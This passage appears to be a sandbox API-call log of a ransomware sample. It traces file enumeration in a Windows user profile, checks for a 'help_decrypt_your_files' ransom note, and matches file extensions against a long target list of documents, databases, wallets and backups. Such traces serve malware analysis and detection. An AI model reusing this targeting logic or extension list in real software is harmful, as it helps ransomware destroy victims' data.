	[0180.945] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.945] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="ntuser.dat.LOG2" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2") returned="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2"
	[0180.945] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2") returned 37
	[0180.945] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.945] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2", cchLength=0x25 | out: lpsz="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log2") returned 0x25
	[0180.945] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.946] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log2", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.946] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log2" | out: lpString1="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log2") returned="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log2"
	[0180.946] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\ntuser.dat.log2") returned 37
	[0180.946] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.947] StrStrW (lpFirst=".log2", lpSrch=".") returned=".log2"
	[0180.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.947] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".log2") returned 0x0
	[0180.947] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1
	[0180.947] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", lpString2="..") returned 1
	[0180.947] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", lpString2=".") returned 1
	[0180.948] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.948] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf"
	[0180.948] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned 77
	[0180.948] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.948] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cchLength=0x4d | out: lpsz="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf") returned 0x4d
	[0180.948] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.949] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.949] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf") returned="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf"
	[0180.949] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf") returned 77
	[0180.949] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.949] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.950] StrStrW (lpFirst=".blf", lpSrch=".") returned=".blf"
	[0180.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.950] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".blf") returned 0x0
	[0180.950] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1
	[0180.951] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1
	[0180.951] lstrcmpW (lpString1="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1
	[0180.951] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.951] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms"
	[0180.951] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned 114
	[0180.951] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.952] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cchLength=0x72 | out: lpsz="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms") returned 0x72
	[0180.952] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.952] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.952] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms" | out: lpString1="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms") returned="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms"
	[0180.952] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms") returned 114
	[0180.952] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.953] StrStrW (lpFirst=".regtrans-ms", lpSrch=".") returned=".regtrans-ms"
	[0180.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.953] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.